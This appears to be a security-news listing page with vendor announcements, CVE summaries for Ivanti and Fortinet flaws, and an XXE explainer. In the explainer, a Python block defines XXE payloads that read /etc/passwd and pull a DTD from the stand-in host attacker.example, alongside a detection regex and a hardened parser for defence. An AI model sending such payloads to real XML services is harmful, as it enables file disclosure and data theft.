
Vulnerability

CrowdStrike Named the Only Customers' Choice: 2024 Gartner "Voice of the Customer" for Vulnerability Assessment

It is a common refrain in security circles that “nobody loves their vulnerability management tool.” CrowdStrike may have just proved to be the exception. We are proud to announce that CrowdStrike is the only vendor named a Customers’ Choice in the 2024 Gartner “Voice of the Customer” Report for Vulnerability Assessment. In this report, CrowdStrike is the only vendor placed in the upper right quadrant, meaning we received a Customers’ Choice Distinction.

Snyk & Atlassian: How to embed security in AI-assisted software development

Adding AI to your software development life cycle (SDLC) comes with great opportunities — and great dangers. Is the risk worth the reward? This was the topic of conversation when Sascha Wiswedel, Senior Solutions Engineer at Atlassian, and Simon Maple, Principal Developer Advocate at Snyk, teamed up to discuss security in the (AI-assisted) software development lifecycle.

Applying Vulnerability Intelligence to CVSS and SSVC Frameworks

In this presentation, we explore the intersection of vulnerability intelligence and prioritization frameworks such as CVSS and SSVC as a means for strategically and rapidly prioritizing vulnerabilities to stay ahead of exploitation risks. We delve into the process of applying real-time threat intelligence tailored to the vulnerability landscape to enhance decision-making, optimize resource allocation, and ensure a precise and proactive defense against cyber threats.

What is XML External Entity, How to Find XXE Vulnerabilities and Patch Them

An XXE (XML External Entity) vulnerability arises when an application parses XML from an untrusted source with a parser that still has DTD processing and external entity resolution enabled. The attacker supplies a document whose DTD declares an entity pointing at an external resource, such as a local file (file:///etc/passwd) or a URL on an internal host, and the parser substitutes the contents of that resource wherever the entity is referenced. Depending on the parser and platform, the result is disclosure of server-side files, server-side request forgery against internal services, denial of service through entity expansion, and in some configurations remote code execution. The fix is to disable DTDs, or at least external entity resolution, in the parser that handles untrusted input.
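The following Python example is added here to illustrate the mechanism above; it is not code from the original article or from any vendor mentioned on this page. It builds two constructed XXE payloads (a classic file-read entity and a blind parameter-entity variant pointing at the hypothetical host attacker.example), a cheap pre-parse screen of the kind a WAF rule would apply, and a hardened parser built on the standard-library expat bindings that refuses any DOCTYPE before an entity can even be declared. The last function confirms the documented behaviour of `xml.etree.ElementTree`, which does not resolve external entities and raises `ParseError` instead; parsers such as lxml with `resolve_entities=True`, or a default Java `DocumentBuilder`, are the ones that expand them.

```python
import re
import xml.parsers.expat
import xml.etree.ElementTree as ET

# Constructed sample inputs (not taken from the page). The first declares an
# external general entity that a vulnerable parser would replace with the
# contents of /etc/passwd; the second is a blind XXE payload that pulls an
# attacker-hosted DTD via a parameter entity (attacker.example is hypothetical).
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order><item>&xxe;</item></order>"""

BLIND_XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">
  %dtd;
]>
<order><item>widget</item></order>"""

BENIGN_ORDER = '<?xml version="1.0"?><order><item>widget</item><item>gadget</item></order>'


class DtdNotAllowed(ValueError):
    """Raised when input carries a DOCTYPE; untrusted XML should never need one."""


# Constructs XXE depends on: an external DTD, an external general entity
# (SYSTEM/PUBLIC), or a parameter entity (%name) as used by blind XXE.
_XXE_MARKERS = re.compile(
    r"<!DOCTYPE\s+\S+\s+(?:SYSTEM|PUBLIC)\b"          # external DTD reference
    r"|<!ENTITY\s+%?\s*\S+\s+(?:SYSTEM|PUBLIC)\b",    # external or parameter entity
    re.IGNORECASE,
)


def looks_like_xxe(xml_text: str) -> bool:
    """Pre-parse screen for logging or a WAF rule. Not a substitute for a
    hardened parser, since encoding tricks can evade a regex."""
    return _XXE_MARKERS.search(xml_text) is not None


def parse_items_without_dtd(xml_text: str) -> list[str]:
    """Parse with expat but reject any DOCTYPE, so no entity can be declared,
    let alone resolved. Returns the text of each <item> element."""
    parser = xml.parsers.expat.ParserCreate()
    items, current, in_item = [], [], False

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at '<!DOCTYPE ...' before the internal subset is read;
        # the exception propagates out of parser.Parse().
        raise DtdNotAllowed(f"DOCTYPE {name!r} rejected (sysid={sysid!r})")

    def start(name, attrs):
        nonlocal in_item
        if name == "item":
            in_item = True
            current.clear()

    def end(name):
        nonlocal in_item
        if name == "item":
            items.append("".join(current))   # character data may arrive in chunks
            in_item = False

    def chars(data):
        if in_item:
            current.append(data)

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(xml_text, True)
    return items


def is_rejected(xml_text: str) -> bool:
    """True when the hardened parser refuses the document."""
    try:
        parse_items_without_dtd(xml_text)
    except DtdNotAllowed:
        return True
    return False


def stdlib_etree_expands_external_entity(xml_text: str) -> bool:
    """ElementTree leaves external entities unresolved and raises ParseError
    ('undefined entity'); this returns False for the payloads above."""
    try:
        ET.fromstring(xml_text)
    except ET.ParseError:
        return False
    return True


if __name__ == "__main__":
    for label, doc in (("classic", XXE_PAYLOAD), ("blind", BLIND_XXE_PAYLOAD), ("benign", BENIGN_ORDER)):
        print(f"{label}: screen={looks_like_xxe(doc)} rejected={is_rejected(doc)}")
    print("benign items:", parse_items_without_dtd(BENIGN_ORDER))
```

Rejecting the DOCTYPE outright is the simplest safe setting for data exchanged between services, since none of it needs a DTD; if a legacy format genuinely requires one, the narrower option is to leave the DOCTYPE handler alone and instead refuse to set an `ExternalEntityRefHandler`, which is what keeps expat from fetching the referenced resource.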

Reporting AppSec risk up to your CISO

For security leaders, building a strong working relationship with your CISO often comes down to your ability to provide clear reports and concise risk summaries. Your reports allow CISOs to perform a vital responsibility of their role: translating highly technical security jargon into actionable recommendations that will reduce risk and improve security maturity across the organization. And in the case of a breach or zero-day event, CISOs may be the bearer of bad news.

Teleport Starts Issuing CVEs

Teleport is an open source company. We develop in the open, including full disclosure of security issues in our changelogs and pull requests. We share our penetration tests and key compliance reports. Despite this, our communication to open source users and integration with automated security tooling needed improvement. We needed a standardized way to refer to our vulnerabilities so that when two people (or systems) talk about a vulnerability, they know they’re talking about the same thing.

How Vulnerability Can Make You a Victim on Valentine's Day

According to Netskope’s recent “Year in Review” Cloud and Threat Report, the most common way cyber attackers gained access to organisations in 2023 was through social engineering. It is a favourite tactic of cyber criminals, but at its heart social engineering isn’t about someone breaking code while hunched over a glowing keyboard. It relies on individual human vulnerability, tricking people into opening the door for the attacker to walk through.

Nucleus Security Raises $43 Million Series B Funding to Lead Innovation in Enterprise Risk-Based Vulnerability Management

Nucleus Security announces it has secured $43 million in Series B funding led by Arthur Ventures and Lead Edge Capital. This milestone marks a significant leap forward in the company's mission to redefine how enterprises manage risk exposure from vulnerabilities across infrastructure, cloud, and application portfolios in one unified platform.

CVE-2024-22024: New High-severity Ivanti Authentication Bypass Vulnerability

On February 8, 2024, Ivanti publicly disclosed a high-severity authentication bypass vulnerability (CVE-2024-22024) impacting Ivanti Connect Secure, Policy Secure, and ZTA products. CVE-2024-22024 is an XML external entity (XXE) flaw in the SAML component and could allow threat actors to bypass authentication and access certain restricted resources if successfully exploited.

CVE-2024-21762 and CVE-2024-23113: Multiple Critical Vulnerabilities in Fortinet, One Likely Under Active Exploitation

On February 8, 2024, Fortinet’s FortiGuard disclosed two critical vulnerabilities affecting FortiOS. CVE-2024-23113, a format string vulnerability, and CVE-2024-21762, an out-of-bounds write vulnerability, could allow unauthenticated threat actors to execute arbitrary code or commands. FortiGuard has stated they are aware of potential exploitation of CVE-2024-21762.